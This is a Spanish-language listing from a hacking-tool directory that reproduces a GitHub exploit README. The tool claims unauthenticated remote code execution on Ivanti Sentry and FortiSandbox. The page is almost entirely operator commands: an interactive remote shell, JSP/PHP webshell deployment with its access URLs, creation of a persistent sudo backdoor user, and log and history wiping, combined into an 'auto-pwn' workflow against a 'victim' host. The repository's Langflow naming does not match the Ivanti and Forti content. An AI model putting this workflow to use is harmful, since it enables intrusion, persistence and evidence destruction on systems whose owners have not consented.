Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5027-Langflow — Herramienta de explotación multi-CVE para ejecución remota de código sin autenticación en Ivanti Sentry y FortiSandbox. Incluye shell interactiva, despliegue de webshell, creación de usuarios backdoor y limpieza de registros para pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/layer-6/cve-2026-5027-langflow
Escalada de PrivilegiosMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Herramienta de Acceso Remoto
Desarrollo de Payloads
GitHublayer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

Herramienta de explotación multi-CVE para ejecución remota de código sin autenticación en Ivanti Sentry y FortiSandbox. Incluye shell interactiva, despliegue de webshell, creación de usuarios backdoor y limpieza de registros para pruebas de penetración.

Ver Repositorio
hace 2 mesesAún no revisado

(CVE-2026-5027) y (CVE-2026-10520) (CVE-2026-25089) explotador:

Clonar

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

Uso del archivo (exploit.py)

Pruebas automáticas y explotación.

root@kitploit:~
python3 exploit.py -u https://target.com

Configuración personalizada de CLI

Usa tu propio webshell cuando el shell está dentro de una carpeta:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

Cuando el shell está en la carpeta de la herramienta o dentro del terminal sin una carpeta:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

Tu webshell puede ser (PHP, Python (CGI), Perl, Ruby, ASPX).

Puedes configurar el tiempo de espera con --t y cargar/usar payload o ruta personalizada desde carpetas y archivos con --p:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

Ejemplo:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

Uso del archivo (exploitt.py)

Diseñado para los siguientes CVEs:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

Ejecución Remota de Código sin autenticación

No se requieren credenciales.

📖 Uso

Inicio rápido - menú interactivo (sin argumentos)

root@kitploit:~
python3 exploitt.py

Luego sigue las indicaciones:

1. Elige el tipo de objetivo (Ivanti o Forti)

  1. Ingresa la URL del objetivo (ej. https://192.168.1.100:8443)
  2. Configura tiempo de espera, proxy, modo debug
  3. Elige la acción (comando, shell, webshell, etc.)

Línea de comandos (avanzado)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# Verificar si es vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# Shell interactivo
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# Desplegar webshell JSP (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# Crear usuario backdoor + limpiar logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# Comando único
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# Shell interactivo con subida de archivos
python3 exploitt.py -u https://forti.example.com --type forti -s
# Dentro del shell: upload /path/local.txt /remote/path.txt

# Desplegar webshell PHP
python3 exploitt.py -u https://forti.example.com --type forti -w

# Auto‑pwn completo (verificar, shell, webshell, persistir, limpiar)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
  1. Detección automática (el script adivina el servicio)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
  1. Usar proxy y debug
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

Argumentos de línea de comandos disponibles

Comandos del shell interactivo

ComandoEjemploDescripción
normal commandidEjecutar cualquier comando del sistema
uploadupload exploit.sh /tmp/backdoor.shSubir archivo local al host remoto
exitexitSalir del shell

Detalles de despliegue de webshell

· Ivanti Sentry – despliega un shell .jsp dentro de Tomcat webapps (/usr/local/tomcat/webapps/ROOT/) · Acceso mediante https://target/shell_random.jsp?cmd=whoami · FortiSandbox – despliega un shell .php dentro de la raíz web (/var/www/html/) · Acceso mediante https://target/shell_random.php?cmd=whoami

Ejemplo de flujo de trabajo (prueba de penetración completa)

root@kitploit:~
# 1. Detectar y explotar
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. Dentro del shell, verificar privilegios
id

# 3. Desplegar webshell para persistencia
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. Crear un usuario backdoor
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. Limpiar registros
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

Canal de Telegram Red:

https://t.me/Red_Rooted_Ghost

Descargar herramienta
ArgumentoDescripción
-u, --urlURL del objetivo (ej. https://192.168.1.100:8443)
--typeForzar servicio: ivanti o forti (opcional, detección automática)
-t, --timeoutTiempo de espera de la solicitud en segundos (por defecto 30)
--proxyProxy HTTP/HTTPS (ej. http://127.0.0.1:8080)
-d, --debugHabilitar salida de depuración
--uaCadena User-Agent personalizada
-c, --cmdEjecutar un solo comando y salir
-s, --shellIniciar shell interactivo
-w, --webshellDesplegar un webshell (PHP para Forti, JSP para Ivanti)
-p, --persistCrear usuario backdoor persistente con sudo
--cleanLimpiar registros e historial de comandos después de la explotación